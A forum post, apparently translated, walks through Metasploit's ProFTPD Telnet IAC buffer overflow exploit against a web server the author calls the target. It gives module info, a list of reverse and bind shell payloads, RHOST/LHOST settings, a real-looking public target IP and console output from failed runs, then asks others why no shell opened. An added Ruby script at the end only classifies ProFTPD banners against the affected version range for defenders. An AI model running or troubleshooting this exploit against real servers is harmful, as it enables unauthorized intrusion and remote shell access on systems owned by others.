I bring you a new bombshell from our beloved Metasploit.
It's an exploit that gives you a remote shell on servers that have port 21 open with ProFTPD as the service, up to version 1.3.3a... That is, most of them...
I haven't managed to get it to run completely, so I'm asking someone to tell me what's failing for me:
We load the exploit:
use exploit/linux/ftp/proftp_telnet_iac
Let's see what it's about:
msf exploit(proftp_telnet_iac) > info
Name: ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
Version: 10922
Platform: Linux
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Provided by:
jduck <[email protected]>
Available targets:
Id Name
-- ----
0 Automatic Targeting
1 Debug
2 ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1
3 ProFTPD 1_3_3a Server (Debian) - Squeeze Beta1 (Debug)
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS [email protected] no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST yes The target address
RPORT 21 yes The target port
Payload information:
Space: 4096
Avoid: 4 characters
Description:
This module exploits a stack-based buffer overflow in versions of
ProFTPD server between versions 1.3.2rc3 and 1.3.3b. By sending data
containing a large number of Telnet IAC commands, an attacker can
corrupt memory and execute arbitrary code. This version of the
exploit uses a little ROP stub to indirectly transfer the flow of
execution to a pool buffer (the cmd_rec "res" in "pr_cmd_read").
NOTE: Most Linux distributions either do not ship a vulnerable
version of ProFTPD, or they ship a version compiled with stack
smashing protection. As of this writing, SSP is believed to
successfully mitigate this vulnerability.
References:
[External link removed for guests]
[External link removed for guests]
[External link removed for guests]
We load the PAYLOAD:
msf exploit(proftp_telnet_iac) > set PAYLOAD
set PAYLOAD generic/debug_trap
set PAYLOAD generic/shell_bind_tcp
set PAYLOAD generic/shell_reverse_tcp
set PAYLOAD generic/tight_loop
set PAYLOAD linux/x86/adduser
set PAYLOAD linux/x86/chmod
set PAYLOAD linux/x86/exec
set PAYLOAD linux/x86/meterpreter/bind_ipv6_tcp
set PAYLOAD linux/x86/meterpreter/bind_tcp
set PAYLOAD linux/x86/meterpreter/reverse_ipv6_tcp
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set PAYLOAD linux/x86/metsvc_bind_tcp
set PAYLOAD linux/x86/metsvc_reverse_tcp
set PAYLOAD linux/x86/shell/bind_ipv6_tcp
set PAYLOAD linux/x86/shell/bind_tcp
set PAYLOAD linux/x86/shell/reverse_ipv6_tcp
set PAYLOAD linux/x86/shell/reverse_tcp
set PAYLOAD linux/x86/shell_bind_ipv6_tcp
set PAYLOAD linux/x86/shell_bind_tcp
set PAYLOAD linux/x86/shell_reverse_tcp
set PAYLOAD linux/x86/shell_reverse_tcp2
In this case, shell_reverse_tcp:
msf exploit(proftp_telnet_iac) > set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
We fill in the target's IP. If we don't know it, pinging it is enough (ping whatever.com):
We fill in the host we want to attack (its IP) and the port on which we want to receive the connection:
msf exploit(proftp_telnet_iac) > set RHOST IP_WEB_OBJETIVO
RHOST => IP_WEB_OBJETIVO
msf exploit(proftp_telnet_iac) > set LHOST IP_LOCAL
LHOST => IP_LOCAL
msf exploit(proftp_telnet_iac) > set LPORT 9001
LPORT => 9001
It's important that we NAT the port selected in LPORT to our IP_LOCAL (LHOST).
Everything should end up like this:
msf exploit(proftp_telnet_iac) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS [email protected] no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST IP_WEB_OBJETIVO yes The target address
RPORT 21 yes The target port
Payload options (linux/x86/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.131 yes The listen address
LPORT 9001 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
We launch the exploit:
msf exploit(proftp_telnet_iac) > exploit -j
It spits this out at me:
[-] Handler failed to bind to IP_WEB_OBJETIVO:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Connecting to FTP server IP_WEB_OBJETIVO:21...
[*] Connected to target FTP server.
[*] Automatically detecting the target...
[*] No matching target
[*] Exploit completed, but no session was created.
I don't know why; it's as if it weren't finding the target. So I look at which TARGETS there are:
msf exploit(proftp_telnet_iac) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Debug
2 ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1
3 ProFTPD 1_3_3a Server (Debian) - Squeeze Beta1 (Debug)
What's the failure??? I've tried selecting target 1 (Debug) and I get this:
msf exploit(proftp_telnet_iac) > set TARGET 1
TARGET => 1
msf exploit(proftp_telnet_iac) > exploit
[*] Started reverse handler on 192.168.1.131:9001
[*] Connecting to FTP server 85.10.140.119:21...
[*] Connected to target FTP server.
[*] Trying target Debug...
[*] FTP Banner: 220 ProFTPD 1.3.1 Server (ProFTPD) [85.10.140.119]
[*] Your payload should have executed now...
[*] Exploit completed, but no session was created.
I've set multi/handler listening in case the shell came in, but nothing...
What am I doing wrong???
Cheers!!!
PS: Exploit on exploit-db: [External link removed for guests]
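The module description quoted in the post places the affected range at ProFTPD 1.3.2rc3 through 1.3.3b, and the Debug run's "FTP Banner" line shows what a server announces about itself. For a defender inventorying their own FTP servers, the useful check is whether a greeting banner falls inside that range. The following Ruby script is an added example, not code from the post or from the Metasploit module: it parses the `220 ProFTPD x.y.z Server ...` greeting and classifies the version against the module's stated range. The banner strings and the 203.0.113.x hosts are constructed samples, and the version ordering (rc builds before the final release, letter suffixes after it) is an assumption based on ProFTPD's naming.

```ruby
# Added example (not from the original post): classify a ProFTPD greeting
# banner against the affected range quoted in the module info, 1.3.2rc3..1.3.3b.

AFFECTED_LOW  = "1.3.2rc3"
AFFECTED_HIGH = "1.3.3b"

# Turn a ProFTPD version string into a comparable array.
# Ordering assumed from ProFTPD's naming:
#   1.3.2rc1 < 1.3.2rc3 < 1.3.2 < 1.3.2a < 1.3.3 < 1.3.3a < 1.3.3b
def version_key(ver)
  m = ver.match(/\A(\d+)\.(\d+)\.(\d+)(?:rc(\d+)|([a-z]))?\z/)
  raise ArgumentError, "unrecognised ProFTPD version: #{ver.inspect}" unless m
  major, minor, patch = m[1].to_i, m[2].to_i, m[3].to_i
  if m[4]
    # release candidate: sorts before the final release of the same number
    [major, minor, patch, 0, m[4].to_i]
  else
    # final release; an optional letter suffix sorts after the bare version
    letter = m[5] ? (m[5].ord - 'a'.ord + 1) : 0
    [major, minor, patch, 1, letter]
  end
end

# Extract the version from a "220 ProFTPD x.y.z Server (...)" greeting;
# returns nil when the banner is not a ProFTPD greeting.
def banner_version(banner)
  m = banner.match(/\A220[ -]ProFTPD\s+(\S+)\s+Server/)
  m && m[1]
end

# true when the version lies inside the affected range (both ends inclusive)
def affected_version?(ver)
  key = version_key(ver)
  (version_key(AFFECTED_LOW) <=> key) <= 0 && (key <=> version_key(AFFECTED_HIGH)) <= 0
end

# :affected, :not_affected, or :unknown (not ProFTPD / unparsable version)
def classify_banner(banner)
  ver = banner_version(banner)
  return :unknown unless ver
  affected_version?(ver) ? :affected : :not_affected
rescue ArgumentError
  :unknown
end

# Constructed sample banners; hosts are documentation-range placeholders.
SAMPLE_BANNERS = [
  "220 ProFTPD 1.3.1 Server (ProFTPD) [203.0.113.10]",     # below the range
  "220 ProFTPD 1.3.3a Server (Debian) [203.0.113.11]",     # inside the range
  "220 ProFTPD 1.3.2rc3 Server (ProFTPD) [203.0.113.12]",  # lower bound
  "220 ProFTPD 1.3.3c Server (ProFTPD) [203.0.113.13]",    # above the range
  "220 (vsFTPd 3.0.3)",                                    # not ProFTPD
]

if __FILE__ == $0
  SAMPLE_BANNERS.each { |b| puts "#{classify_banner(b).to_s.ljust(13)} #{b}" }
end
```

Treat the result as a triage signal only: the module's own note says distributions often ship patched builds or compile with stack-smashing protection, and neither shows up in a banner, so an `:affected` classification should be confirmed against the host's package metadata before anything is scheduled for remediation.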